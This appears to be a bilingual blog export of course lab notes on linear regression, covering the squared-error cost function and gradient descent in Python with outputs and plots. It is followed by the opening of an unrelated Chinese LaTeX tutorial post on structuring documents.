    from lab_utils_uni import plt_intuition, plt_stationary, plt_update_onclick, soup_bowl
    plt.style.use('./deeplearning.mplstyle')

    Problem Statement

    You would like a model which can predict housing prices given the size of the house.
    Let’s use the same two data points as before the previous lab- a house with 1000square feet sold for $300,000 and a house with 2000square feet sold for $500,000.

    您需要一个模型,该模型可以根据房屋的大小预测房价。
    让我们使用与上一个实验室之前相同的两个数据点 - 一个以$300,000 出售的 1000 平方英尺的房子和以$500,000 出售的 2000 平方英尺的房屋。

    Size (1000sqft)Price (1000s of dollars)
    1300
    2500
    1
    2
    x_train = np.array([1.0, 2.0])           #(size in 1000square feet)
    y_train = np.array([300.0, 500.0]) #(price in 1000s of dollars)

    Computing Cost

    The term ‘cost’ in this assignment might be a little confusing since the data is housing cost. Here, cost is a measure how well our model is predicting the target price of the house. The term ‘price’ is used for housing data.

    此分配中的术语“成本”可能有点令人困惑,因为数据是住房成本。在这里,成本是衡量我们的模型预测房屋目标价格的能力。术语“价格”用于住房数据。

    The equation for cost with one variable is:
    $$J(w,b) = \frac{1}{2m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y{(i)})2 \tag{1}$$

    where
    $$f_{w,b}(x^{(i)}) = wx^{(i)} + b \tag{2}$$

    • $f_{w,b}(x^{(i)})$ is our prediction for example $i$ using parameters $w,b$.
      • $f_{w,b}(x^{(i)})$ 是我们的预测,例如使用参数 $w,b$ $i$。
    • $(f_{w,b}(x^{(i)}) -y{(i)})2$ is the squared difference between the target value and the prediction.
      • $(f_{w,b}(x^{(i)}) -y{(i)})2$ 是目标值和预测值之间的平方差
    • These differences are summed over all the $m$ examples and divided by 2m to produce the cost, $J(w,b)$.
      • 这些差异在所有$m$示例中相加,然后除以2m以产生成本, $J(w,b)$.

    Note, in lecture summation ranges are typically from 1 to m, while code will be from 0 to m-1.
    请注意,在课程中,求和范围通常为 1 到 m,而代码的范围是从 0 到 m-1。

    The code below calculates cost by looping over each example. In each loop:

    • f_wb, a prediction is calculated
    • the difference between the target and the prediction is calculated and squared.
    • this is added to the total cost.

    下面的代码通过循环遍历每个示例来计算成本。在每个循环中:

    • f_wb,计算预测
    • 计算目标和预测之间的差值并平方。
    • 这被添加到总成本中。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    def compute_cost(x, y, w, b): 
    """
    Computes the cost function for linear regression.
    计算线性回归的成本函数。

    Args:
    x (ndarray (m,)): Data, m examples
    y (ndarray (m,)): target values
    w,b (scalar) : model parameters

    Returns
    total_cost (float): The cost of using w,b as the parameters for linear regression
    to fit the data points in x and y
    total_cost(float):使用 w,b 作为线性回归参数的成本
    以拟合 x 和 y 中的数据点
    """
    # number of training examples
    m = x.shape[0]

    cost_sum = 0
    for i in range(m):
    f_wb = w * x[i] + b
    cost = (f_wb - y[i]) ** 2
    cost_sum = cost_sum + cost
    total_cost = (1 / (2 * m)) * cost_sum

    return total_cost

    Cost Function Intuition

    png
    Your goal is to find a model $f_{w,b}(x) = wx + b$, with parameters $w,b$, which will accurately predict house values given an input $x$. The cost is a measure of how accurate the model is on the training data.

    The cost equation (1) above shows that if $w$ and $b$ can be selected such that the predictions $f_{w,b}(x)$ match the target data $y$, the $(f_{w,b}(x^{(i)}) - y{(i)})2 $ term will be zero and the cost minimized. In this simple two point example, you can achieve this!

    In the previous lab, you determined that $b=100$ provided an optimal solution so let’s set $b$ to 100 and focus on $w$.


    Below, use the slider control to select the value of $w$ that minimizes cost. It can take a few seconds for the plot to update.

    您的目标是找到一个模型,$f_{w,b}(x) = wx + b$,参数$w,b$,这将在给定输入$x$的情况下准确预测房屋价值。成本是模型在训练数据上的准确程度的度量。

    上面的成本等式(1)表明,如果可以选择 $w$ 和 $b$,使得预测$f_{w,b}(x)$ 与目标数据 $y$ 匹配,则 $(f_{w,b}(x^{(i)}) - y{(i)})2 $ 项将为零,并且成本最小化。在这个简单的两点示例中,您可以实现此目的!

    在之前的实验中,您确定$b=100$ 提供了最佳解决方案,因此让我们将 $b$ 设置为 100,并专注于 $w$。


    下面,使用滑块控件选择$w$ 的值,以最大限度地降低成本。可能需要几秒钟才能更新绘图。

    啥也出不来 orz

    1
    plt_intuition(x_train,y_train)
    interactive(children=(IntSlider(value=150, description='w', max=400, step=10), Output()), _dom_classes=('widge…

    The plot contains a few points that are worth mentioning.

    • cost is minimized when $w = 200$, which matches results from the previous lab
    • Because the difference between the target and pediction is squared in the cost equation, the cost increases rapidly when $w$ is either too large or too small.
    • Using the w and b selected by minimizing cost results in a line which is a perfect fit to the data.

    该图包含了几个值得一提的要点。

    • 当 $w = 200$ 时,成本最小化,这与上一个实验室的结果相匹配
    • 由于目标和国家之间的差异在成本等式中是平方的,因此当 $w$ 美元太大或太小时,成本会迅速增加。
    • 使用通过最小化成本选择的wb,可以生成一条与数据完美匹配的线。

    Cost Function Visualization- 3D

    You can see how cost varies with respect to both w and b by plotting in 3D or using a contour plot.
    It is worth noting that some of the plotting in this course can become quite involved. The plotting routines are provided and while it can be instructive to read through the code to become familiar with the methods, it is not needed to complete the course successfully. The routines are in lab_utils_uni.py in the local directory.

    您可以通过以 3D 方式绘制或使用等高线图来了解成本相对于 两者 wb 的变化。
    值得注意的是,本课程中的一些情节可能会变得非常复杂。提供了绘图例程,虽然通读代码以熟悉方法可能很有启发性,但成功完成课程并不需要。这些例程位于本地目录的 lab_utils_uni.py 中。

    Larger Data Set

    It’s use instructive to view a scenario with a few more data points. This data set includes data points that do not fall on the same line. What does that mean for the cost equation? Can we find $w$, and $b$ that will give us a cost of 0?

    使用具有更多数据点来查看方案具有指导意义。此数据集包括不在同一行上的数据点。这对成本等式意味着什么?我们能找到$w$,$b$,这将使我们的成本为 0 吗?

    1
    2
    x_train = np.array([1.0, 1.7, 2.0, 2.5, 3.0, 3.2])
    y_train = np.array([250, 300, 480, 430, 630, 730,])

    In the contour plot, click on a point to select w and b to achieve the lowest cost. Use the contours to guide your selections. Note, it can take a few seconds to update the graph.

    在等值线图中,单击一个点以选择wb以实现最低成本。使用等值线来指导您的选择。请注意,更新图表可能需要几秒钟。

    1
    2
    3
    plt.close('all') 
    fig, ax, dyn_items = plt_stationary(x_train, y_train)
    updater = plt_update_onclick(fig, ax, x_train, y_train, dyn_items)

    png

    Above, note the dashed lines in the left plot. These represent the portion of the cost contributed by each example in your training set. In this case, values of approximately $w=209$ and $b=2.4$ provide low cost. Note that, because our training examples are not on a line, the minimum cost is not zero.

    在上面,请注意左侧图中的虚线。这些表示训练集中每个示例所贡献的成本部分。在这种情况下,大约$w=209$和$b=2.4$提供了低成本。请注意,由于我们的训练示例不在一条线上,因此最低成本不为零。

    Convex Cost surface

    The fact that the cost function squares the loss ensures that the ‘error surface’ is convex like a soup bowl. It will always have a minimum that can be reached by following the gradient in all dimensions. In the previous plot, because the $w$ and $b$ dimensions scale differently, this is not easy to recognize. The following plot, where $w$ and $b$ are symmetric, was shown in lecture:

    成本函数对损失进行平方的事实确保了“误差表面”像汤碗一样凸起。它将始终具有可以通过遵循所有维度的梯度来达到的最小值。在前面的图中,由于$w$和$b$的尺寸比例不同,所以不容易识别。以下图,其中$w$和$b$是对称的,在课程中显示:

    1
    soup_bowl()

    png

    Congratulations!

    You have learned the following:

    • The cost equation provides a measure of how well your predictions match your training data.
    • Minimizing the cost can provide optimal values of $w$, $b$.

    您已经了解了以下内容:

    • 成本等式用于衡量您的预测与训练数据匹配的程度。
    • 最小化成本可以提供$w$,$b$的最佳值。

    Optional Lab: Gradient Descent for Linear Regression

    png

    Goals

    In this lab, you will:

    • automate the process of optimizing $w$ and $b$ using gradient descent.
    • 使用梯度下降自动执行优化 $w$ 和 $b$ 的过程。

    Tools

    In this lab, we will make use of:

    • NumPy, a popular library for scientific computing
    • Matplotlib, a popular library for plotting data
    • plotting routines in the lab_utils.py file in the local directory
    1
    2
    3
    4
    5
    import math, copy
    import numpy as np
    import matplotlib.pyplot as plt
    plt.style.use('./deeplearning.mplstyle')
    from lab_utils_uni import plt_house_x, plt_contour_wgrad, plt_divergence, plt_gradients
    1
    !ls -al
    'ls' 不是内部或外部命令,也不是可运行的程序或批处理文件。

    Problem Statement

    Let’s use the same two data points as before - a house with 1000square feet sold for $300,000 and a house with 2000square feet sold for $500,000.

    Size (1000sqft)Price (1000s of dollars)
    1300
    2500
    1
    2
    3
    # Load our data set
    x_train = np.array([1.0, 2.0]) #features
    y_train = np.array([300.0, 500.0]) #target value

    Compute_Cost

    This was developed in the last lab. We’ll need it again here.

    这是在上一个实验中撰写的。我们在这里再次需要它。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    #Function to calculate the cost
    def compute_cost(x, y, w, b):

    m = x.shape[0]
    cost = 0

    for i in range(m):
    f_wb = w * x[i] + b
    cost = cost + (f_wb - y[i])**2
    total_cost = 1 / (2 * m) * cost

    return total_cost

    Gradient descent summary

    So far in this course, you have developed a linear model that predicts $f_{w,b}(x^{(i)})$:

    到目前为止,在本课程中,您已经开发了一个线性模型来预测 $f_{w,b}(x^{(i)})$:

    $$f_{w,b}(x^{(i)}) = wx^{(i)} + b \tag{1}$$
    In linear regression, you utilize input training data to fit the parameters $w$,$b$ by minimizing a measure of the error between our predictions $f_{w,b}(x^{(i)})$ and the actual data $y^{(i)}$. The measure is called the $cost$, $J(w,b)$. In training you measure the cost over all of our training samples $x{(i)},y{(i)}$

    在线性回归中,您利用输入训练数据来拟合参数 $w$, $b$,$b$ 通过最小化我们的预测 $f_{w,b}(x^{(i)})$ 与实际数据 $y^{(i)}$ 之间的误差度量。该度量称为 $cost$ , $J(w,b)$。在训练中,您可以测量我们所有训练样本 $x{(i)},y{(i)}$ 的 $cost$

    $$J(w,b) = \frac{1}{2m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y{(i)})2\tag{2}$$

    In lecture, gradient descent was described as:

    在课程中,梯度下降被描述为:

    $$\begin{align*} \text{repeat}&\text{ until convergence:} ; \lbrace \newline
    ; w &= w - \alpha \frac{\partial J(w,b)}{\partial w} \tag{3} ; \newline
    b &= b - \alpha \frac{\partial J(w,b)}{\partial b} \newline \rbrace
    \end{align*}$$
    where, parameters $w$, $b$ are updated simultaneously.

    其中,参数 w、b 同时更新。

    The gradient is defined as:

    梯度定义为:

    $$
    \begin{align}
    \frac{\partial J(w,b)}{\partial w} &= \frac{1}{m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y{(i)})x{(i)} \tag{4}\
    \frac{\partial J(w,b)}{\partial b} &= \frac{1}{m} \sum\limits_{i = 0}^{m-1} (f_{w,b}(x^{(i)}) - y^{(i)}) \tag{5}\
    \end{align}
    $$

    Here simultaniously means that you calculate the partial derivatives for all the parameters before updating any of the parameters.

    此处 同时 表示在更新任何参数之前计算所有参数的偏导数。

    Implement Gradient Descent 实现梯度下降

    You will implement gradient descent algorithm for one feature. You will need three functions.

    您将为一个要素实现梯度下降算法。您将需要三个函数。

    • compute_gradient implementing equation (4) and (5) above
      • 实现上述等式(4)和(5)
    • compute_cost implementing equation (2) above (code from previous lab)
      • 实现上面的等式(2)(上一个实验的代码)
    • gradient_descent, utilizing compute_gradient and compute_cost
      • 利用 compute_gradient 和 compute_cost

    Conventions: 规定:

    • The naming of python variables containing partial derivatives follows this pattern,$\frac{\partial J(w,b)}{\partial b}$ will be dj_db.
      • 包含偏导数的 python 变量的命名遵循此模式, 将 $\frac{\partial J(w,b)}{\partial b}$ 记作 dj_db
    • w.r.t is With Respect To, as in partial derivative of $J(wb)$ With Respect To $b$.
      • w.r.t 是关于,如 $J(wb)$ 相对于 $b$ 的偏导数。

    compute_gradient


    compute_gradient implements (4) and (5) above and returns $\frac{\partial J(w,b)}{\partial w}$,$\frac{\partial J(w,b)}{\partial b}$. The embedded comments describe the operations.

    compute_gradient 实现 (4) 和 (5) 并返回 $\frac{\partial J(w,b)}{\partial w}$,$\frac{\partial J(w,b)}{\partial b}$。嵌入的注释描述操作。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    def compute_gradient(x, y, w, b): 
    """
    Computes the gradient for linear regression
    计算线性回归的梯度
    Args:
    x (ndarray (m,)): Data, m examples
    y (ndarray (m,)): target values
    w,b (scalar) : model parameters
    Returns
    dj_dw (scalar): The gradient of the cost w.r.t. the parameters w
    dj_db (scalar): The gradient of the cost w.r.t. the parameter b
    """

    # Number of training examples
    m = x.shape[0]
    dj_dw = 0
    dj_db = 0

    for i in range(m):
    f_wb = w * x[i] + b
    dj_dw_i = (f_wb - y[i]) * x[i]
    dj_db_i = f_wb - y[i]
    dj_db += dj_db_i
    dj_dw += dj_dw_i
    dj_dw = dj_dw / m
    dj_db = dj_db / m

    return dj_dw, dj_db

    png

    The lectures described how gradient descent utilizes the partial derivative of the cost with respect to a parameter at a point to update that parameter.
    Let’s use our compute_gradient function to find and plot some partial derivatives of our cost function relative to one of the parameters, $w_0$.

    课程描述了梯度下降如何利用成本相对于某个点的参数的偏导数来更新该参数。
    让我们使用compute_gradient函数来查找并绘制成本函数相对于其中一个参数 $w_0$ 的一些偏导数。

    1
    2
    plt_gradients(x_train,y_train, compute_cost, compute_gradient)
    plt.show()

    png

    Above, the left plot shows $\frac{\partial J(w,b)}{\partial w}$ or the slope of the cost curve relative to $w$ at three points. On the right side of the plot, the derivative is positive, while on the left it is negative. Due to the ‘bowl shape’, the derivatives will always lead gradient descent toward the bottom where the gradient is zero.

    上图显示了 $\frac{\partial J(w,b)}{\partial w}$ 或成本曲线相对于 $w$ 的斜率在三个点。在图的右侧,导数为正,而在左侧为负。由于“碗形”,衍生物将始终导致梯度下降到梯度为零的底部。

    The left plot has fixed $b=100$. Gradient descent will utilize both $\frac{\partial J(w,b)}{\partial w}$ and $\frac{\partial J(w,b)}{\partial b}$ to update parameters. The ‘quiver plot’ on the right provides a means of viewing the gradient of both parameters. The arrow sizes reflect the magnitude of the gradient at that point. The direction and slope of the arrow reflects the ratio of $\frac{\partial J(w,b)}{\partial w}$ and $\frac{\partial J(w,b)}{\partial b}$ at that point.
    Note that the gradient points away from the minimum. Review equation (3) above. The scaled gradient is subtracted from the current value of $w$ or $b$. This moves the parameter in a direction that will reduce cost.

    左边的图固定 $b=100$。梯度下降将利用 $\frac{\partial J(w,b)}{\partial w}$ 和 $\frac{\partial J(w,b)}{\partial b}$ 来更新参数。右侧的“箭袋图”提供了一种查看两个参数梯度的方法。箭头大小反映了该点处渐变的大小。箭头的方向和斜率反映了该点 $\frac{\partial J(w,b)}{\partial w}$ 和 $\frac{\partial J(w,b)}{\partial b}$ 的比率。请注意,渐变点远离最小值。查看上面的等式(3)。缩放的梯度从 $w$ 或 $b$ 的当前值中减去。这会将参数沿降低成本的方向移动。

    Gradient Descent 梯度下降

    Now that gradients can be computed, gradient descent, described in equation (3) above can be implemented below in gradient_descent. The details of the implementation are described in the comments. Below, you will utilize this function to find optimal values of $w$ and $b$ on the training data.

    现在可以计算梯度,上面等式(3)中描述的梯度下降可以在下面的gradient_descent中实现。注释中描述了实现的详细信息。下面,您将利用此函数在训练数据上找到 $w$ 和 $b$ 的最佳值。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    def gradient_descent(x, y, w_in, b_in, alpha, num_iters, cost_function, gradient_function): 
    """
    Performs gradient descent to fit w,b. Updates w,b by taking
    num_iters gradient steps with learning rate alpha
    执行梯度下降以拟合 w,b。更新 w,b 通过采取
    num_iters 梯度步长与学习速率 alpha

    Args:
    x (ndarray (m,)) : Data, m examples 训练集,m 个样本
    y (ndarray (m,)) : target values 目标值
    w_in,b_in (scalar): initial values of model parameters 模型参数的初始值
    alpha (float): Learning rate 学习率
    num_iters (int): number of iterations to run gradient descent 运行梯度下降的迭代次数
    cost_function: function to call to produce cost 调用函数以产生成本
    gradient_function: function to call to produce gradient 调用以产生渐变的函数

    Returns:
    w (scalar): Updated value of parameter after running gradient descent 更新了运行梯度下降后的参数值
    b (scalar): Updated value of parameter after running gradient descent
    J_history (List): History of cost values
    p_history (list): History of parameters [w,b]
    """

    w = copy.deepcopy(w_in) # avoid modifying global w_in 避免修改全局 w_in
    # An array to store cost J and w's at each iteration primarily for graphing later
    # 一个数组,用于在每次迭代时存储成本 J 和 w,主要用于以后绘制图形
    J_history = []
    p_history = []
    b = b_in
    w = w_in

    for i in range(num_iters):
    # Calculate the gradient and update the parameters using gradient_function
    # 计算梯度并使用 gradient_function 更新参数
    dj_dw, dj_db = gradient_function(x, y, w , b)

    # Update Parameters using equation (3) above
    # 使用上面的等式(3)更新参数
    b = b - alpha * dj_db
    w = w - alpha * dj_dw

    # Save cost J at each iteration
    # 每次迭代时节省成本 J
    if i<100000: # prevent resource exhaustion 防止资源耗尽
    J_history.append( cost_function(x, y, w , b))
    p_history.append([w,b])
    # Print cost every at intervals 10 times or as many iterations if < 10
    # 打印成本每隔 10 次,如果< 10 次,则迭代次数为 10 次
    if i% math.ceil(num_iters/10) == 0:
    print(f"Iteration {i:4}: Cost {J_history[-1]:0.2e} ",
    f"dj_dw: {dj_dw: 0.3e}, dj_db: {dj_db: 0.3e} ",
    f"w: {w: 0.3e}, b:{b: 0.5e}")

    return w, b, J_history, p_history #return w and J,w history for graphing
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    # initialize parameters
    w_init = 0
    b_init = 0
    # some gradient descent settings
    iterations = 10000
    tmp_alpha = 1.0e-2
    # run gradient descent
    w_final, b_final, J_hist, p_hist = gradient_descent(x_train ,y_train, w_init, b_init, tmp_alpha,
    iterations, compute_cost, compute_gradient)
    print(f"(w,b) found by gradient descent: ({w_final:8.4f},{b_final:8.4f})")
    Iteration    0: Cost 7.93e+04  dj_dw: -6.500e+02, dj_db: -4.000e+02   w:  6.500e+00, b: 4.00000e+00Iteration 1000: Cost 3.41e+00  dj_dw: -3.712e-01, dj_db:  6.007e-01   w:  1.949e+02, b: 1.08228e+02Iteration 2000: Cost 7.93e-01  dj_dw: -1.789e-01, dj_db:  2.895e-01   w:  1.975e+02, b: 1.03966e+02Iteration 3000: Cost 1.84e-01  dj_dw: -8.625e-02, dj_db:  1.396e-01   w:  1.988e+02, b: 1.01912e+02Iteration 4000: Cost 4.28e-02  dj_dw: -4.158e-02, dj_db:  6.727e-02   w:  1.994e+02, b: 1.00922e+02Iteration 5000: Cost 9.95e-03  dj_dw: -2.004e-02, dj_db:  3.243e-02   w:  1.997e+02, b: 1.00444e+02Iteration 6000: Cost 2.31e-03  dj_dw: -9.660e-03, dj_db:  1.563e-02   w:  1.999e+02, b: 1.00214e+02Iteration 7000: Cost 5.37e-04  dj_dw: -4.657e-03, dj_db:  7.535e-03   w:  1.999e+02, b: 1.00103e+02Iteration 8000: Cost 1.25e-04  dj_dw: -2.245e-03, dj_db:  3.632e-03   w:  2.000e+02, b: 1.00050e+02Iteration 9000: Cost 2.90e-05  dj_dw: -1.082e-03, dj_db:  1.751e-03   w:  2.000e+02, b: 1.00024e+02(w,b) found by gradient descent: (199.9929,100.0116)

    png
    Take a moment and note some characteristics of the gradient descent process printed above.

    花点时间注意上面打印的渐变下降过程的一些特征。

    • The cost starts large and rapidly declines as described in the slide from the lecture.
      • 成本从大处开始并迅速下降,如课程幻灯片中所述。
    • The partial derivatives, dj_dw, and dj_db also get smaller, rapidly at first and then more slowly. As shown in the diagram from the lecture, as the process nears the ‘bottom of the bowl’ progress is slower due to the smaller value of the derivative at that point.
      • 偏导数、dj_dwdj_db也会变小,一开始很快,然后变慢。如讲座中的图表所示,由于该过程接近“碗的底部”,由于该点的导数值较小,因此进度较慢。
    • progress slows though the learning rate, alpha, remains fixed
      • 进度缓慢,但学习速率(alpha)保持不变

    Cost versus iterations of gradient descent 梯度下降的成本 VS 迭代

    A plot of cost versus iterations is a useful measure of progress in gradient descent. Cost should always decrease in successful runs. The change in cost is so rapid initially, it is useful to plot the initial decent on a different scale than the final descent. In the plots below, note the scale of cost on the axes and the iteration step.

    成本与迭代图是梯度下降进度的有用度量。在成功运行时,成本应始终降低。成本的变化最初是如此之快,因此在与最终下降不同的尺度上绘制初始体面是有用的。在下面的图中,请注意轴上的成本比例和迭代步骤。

    1
    2
    3
    4
    5
    6
    7
    8
    # plot cost versus iteration  
    fig, (ax1, ax2) = plt.subplots(1, 2, constrained_layout=True, figsize=(12,4))
    ax1.plot(J_hist[:100])
    ax2.plot(1000 + np.arange(len(J_hist[1000:])), J_hist[1000:])
    ax1.set_title("Cost vs. iteration(start)"); ax2.set_title("Cost vs. iteration (end)")
    ax1.set_ylabel('Cost') ; ax2.set_ylabel('Cost')
    ax1.set_xlabel('iteration step') ; ax2.set_xlabel('iteration step')
    plt.show()

    png

    Predictions 预测

    Now that you have discovered the optimal values for the parameters $w$ and $b$, you can now use the model to predict housing values based on our learned parameters. As expected, the predicted values are nearly the same as the training values for the same housing. Further, the value not in the prediction is in line with the expected value.

    现在,您已经发现了参数$w$ 和 $b$ 的最优值,现在可以使用该模型根据我们学习的参数预测住房值。正如预期的那样,预测值几乎与同一住房的训练值相同。此外,预测中没有的值与预期值一致。

    1
    2
    3
    print(f"1000sqft house prediction {w_final*1.0 + b_final:0.1f} Thousand dollars")
    print(f"1200sqft house prediction {w_final*1.2 + b_final:0.1f} Thousand dollars")
    print(f"2000sqft house prediction {w_final*2.0 + b_final:0.1f} Thousand dollars")
    1000sqft house prediction 300.0 Thousand dollars1200sqft house prediction 340.0 Thousand dollars2000sqft house prediction 500.0 Thousand dollars

    Plotting

    You can show the progress of gradient descent during its execution by plotting the cost over iterations on a contour plot of the cost(w,b).

    您可以通过在成本的等值线图(w,b)上绘制迭代成本来显示梯度下降的执行过程中的进度。

    1
    2
    fig, ax = plt.subplots(1,1, figsize=(12, 6))
    plt_contour_wgrad(x_train, y_train, p_hist, ax)

    png

    Above, the contour plot shows the $cost(w,b)$ over a range of $w$ and $b$. Cost levels are represented by the rings. Overlayed, using red arrows, is the path of gradient descent. Here are some things to note:

    • The path makes steady (monotonic) progress toward its goal.
    • initial steps are much larger than the steps near the goal.

    上图显示了 $w$ 和 $b$ 范围内的 $cost(w,b)$。成本水平由环表示。使用红色箭头叠加是渐变下降的路径。以下是一些需要注意的事项:

    • 这条道路朝着其目标稳步(单调)前进。
    • 初始步骤比目标附近的步骤大得多。

    Zooming in, we can see that final steps of gradient descent. Note the distance between steps shrinks as the gradient approaches zero.

    放大,我们可以看到梯度下降的最后一步。请注意,当梯度接近零时,步长之间的距离会缩小。

    1
    2
    3
    fig, ax = plt.subplots(1,1, figsize=(12, 4))
    plt_contour_wgrad(x_train, y_train, p_hist, ax, w_range=[180, 220, 0.5], b_range=[80, 120, 0.5],
    contours=[1,5,10,20],resolution=0.5)

    png

    Increased Learning Rate

    png

    In the lecture, there was a discussion related to the proper value of the learning rate, $\alpha$ in equation(3). The larger $\alpha$ is, the faster gradient descent will converge to a solution. But, if it is too large, gradient descent will diverge. Above you have an example of a solution which converges nicely.

    Let’s try increasing the value of $\alpha$ and see what happens:

    在讲座中,有一个关于学习速率的适当值的讨论,$\alpha$等式 (3)。$\alpha$越大,梯度下降的速度就越快,就会收敛到一个解决方案。但是,如果它太大,梯度下降将发散。上面你有一个解决方案的例子,它很好地收敛了。
    让我们尝试增加 $\alpha$ 的值,看看会发生什么:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    # initialize parameters
    w_init = 0
    b_init = 0
    # set alpha to a large value
    iterations = 10
    tmp_alpha = 8.0e-1
    # run gradient descent
    w_final, b_final, J_hist, p_hist = gradient_descent(x_train ,y_train, w_init, b_init, tmp_alpha,
    iterations, compute_cost, compute_gradient)
    Iteration    0: Cost 2.58e+05  dj_dw: -6.500e+02, dj_db: -4.000e+02   w:  5.200e+02, b: 3.20000e+02Iteration    1: Cost 7.82e+05  dj_dw:  1.130e+03, dj_db:  7.000e+02   w: -3.840e+02, b:-2.40000e+02Iteration    2: Cost 2.37e+06  dj_dw: -1.970e+03, dj_db: -1.216e+03   w:  1.192e+03, b: 7.32800e+02Iteration    3: Cost 7.19e+06  dj_dw:  3.429e+03, dj_db:  2.121e+03   w: -1.551e+03, b:-9.63840e+02Iteration    4: Cost 2.18e+07  dj_dw: -5.974e+03, dj_db: -3.691e+03   w:  3.228e+03, b: 1.98886e+03Iteration    5: Cost 6.62e+07  dj_dw:  1.040e+04, dj_db:  6.431e+03   w: -5.095e+03, b:-3.15579e+03Iteration    6: Cost 2.01e+08  dj_dw: -1.812e+04, dj_db: -1.120e+04   w:  9.402e+03, b: 5.80237e+03Iteration    7: Cost 6.09e+08  dj_dw:  3.156e+04, dj_db:  1.950e+04   w: -1.584e+04, b:-9.80139e+03Iteration    8: Cost 1.85e+09  dj_dw: -5.496e+04, dj_db: -3.397e+04   w:  2.813e+04, b: 1.73730e+04Iteration    9: Cost 5.60e+09  dj_dw:  9.572e+04, dj_db:  5.916e+04   w: -4.845e+04, b:-2.99567e+04

    Above, $w$ and $b$ are bouncing back and forth between positive and negative with the absolute value increasing with each iteration. Further, each iteration $\frac{\partial J(w,b)}{\partial w}$ changes sign and cost is increasing rather than decreasing. This is a clear sign that the learning rate is too large and the solution is diverging.
    Let’s visualize this with a plot.

    上面,$w$ 和 $b$ 在正负之间来回反弹,绝对值随着每次迭代而增加。此外,每次迭代 $\frac{\partial J(w,b)}{\partial w}$ 都会改变符号,成本在增加而不是减少。这是一个明显的迹象,表明学习速率太大,解决方案正在发散。让我们用一个情节来可视化它。

    1
    2
    plt_divergence(p_hist, J_hist,x_train, y_train)
    plt.show()
    ---------------------------------------------------------------------------OverflowError                             Traceback (most recent call last)Input In [16], in <cell line: 1>()----> 1 plt_divergence(p_hist, J_hist,x_train, y_train)      2 plt.show()File ~\Jupyter\吴恩达-ML\week1\work\lab_utils_uni.py:305, in plt_divergence(p_hist, J_hist, x_train, y_train)    303 for i in range(len(w_array)):    304     tmp_w = w_array[i]--> 305     cost[i] = compute_cost(x_train, y_train, tmp_w, fix_b)    307 ax.plot(w_array, cost)    308 ax.plot(x,v, c=dlmagenta)OverflowError: Python int too large to convert to C long

    png

    Above, the left graph shows $w$'s progression over the first few steps of gradient descent. $w$ oscillates from positive to negative and cost grows rapidly. Gradient Descent is operating on both $w$ and $b$ simultaneously, so one needs the 3-D plot on the right for the complete picture.

    上图显示了 w 在梯度下降的前几步中的进展。w 从正向负振荡,成本迅速增长。梯度下降同时在 w 和 b 上运行,因此需要右侧的 3D 图才能获得完整的图像。

    Congratulations!

    In this lab you:

    • delved into the details of gradient descent for a single variable.
    • developed a routine to compute the gradient
    • visualized what the gradient is
    • completed a gradient descent routine
    • utilized gradient descent to find parameters
    • examined the impact of sizing the learning rate

    在本实验中,您将:

    • 深入研究单个变量的梯度下降细节。
    • 开发了一个例程来计算梯度
    • 可视化梯度是什么
    • 完成梯度下降例程
    • 利用梯度下降来查找参数
    • 研究了调整学习率的影响
    ]]> @@ -9728,7 +9728,7 @@ /posts/Latex-%E5%88%98%E6%B5%B7%E6%B4%8B-LaTeX%20%E4%B8%8D%E5%BF%AB%E9%80%9F%E7%9A%84%E5%85%A5%E9%97%A8/ - 讲义

    参考网站

    课程

    第一部分 组织文档结构

    文档由什么组成?

    • 标题
    • 前言/摘要
    • 目录
    • 正文
      • 篇、章、小节、小段
        • 文字、公式
        • 列表:编号的、不编号的、带小标题的
        • 定理、引理、命题、证明、结论
        • 诗歌、引文、程序代码、算法伪码
        • 制表
        • 画图
    • 文献
    • 索引、词汇表

    纲举目张

    $\LaTeX$支持结构化的文档编写方式,步骤:

    • 拟定主题
    • 列出提纲
    • 填写内容
    • 调整格式不要在意格式

    其他软件

    • markdown
    • LYX:结构化的文档写作系统

    LATEX 文档基本结构

    %%% 简单文档
    % 导言:格式设置
    \documentclass{ctexart}
    \usepackage[b5paper]{geometry}
    % 正文:填写内容
    \begin{document}
    使用 \LaTeX
    \end{document}

    document环境为界,

    • document环境前是导言部分(preamble);

    • 环境内部是正文部分;

    • 环境之后的部分被忽略

    在导言区进行格式设置,正文部分套用格式。

    文档部件

    • 标题:\title\author\date——\maketitle
    • 摘要/前言:abstract环境/\chapter*
    • 目录:\tableofcontents
    • 章节:\chapter\section
    • 附录:\appendix+\chapter\section
    • 文献:\bibliography
    • 索引:\printindex

    文档划分

    • 大型文档:
      • \frontmatter
      • \mainmatter
      • \backmatter
    • 一般文档:
      • \appendix
    层次名称命令说明
    -1part\part可选的最高层
    0chapter\chapterreportbook类最高层:
    1section\sectionarticle类最高层:学生论文
    2subsection\subsectionreport, book
    3subsubsection\subsubsection默认不编号、不编目录
    4paragraph\paragraph默认不编号、不编目录
    5subparagraph\subparagraph默认不编号、不编目录

    磁盘文件组织

    小文档将所有内容写在同一个目录中。对比较大的文档,可以将文档分成多个文件,并划分文件目录结构:

    • 主文档,给出文档框架结构
    • 按内容章节划分不同的文件
    • 使用单独的类文件和格式文件设置格式
    • 用小文件隔离复杂的图表

    相关命令:

    • \documentclass:读入文档类文件(.cls)
    • \usepackage:读入一个格式文件——宏包(.sty)
    • \include:分页,并读入章节文件(.tex)
    • \input:读入任意的文件

    文档框架示例

    png

    第二部分 填写文档内容

    LATEX 基础

    迟到的 Hello world.

    找个东西输入文本:

    \documentclass{article}
    \begin{document}
    Hello world.
    \end{document}

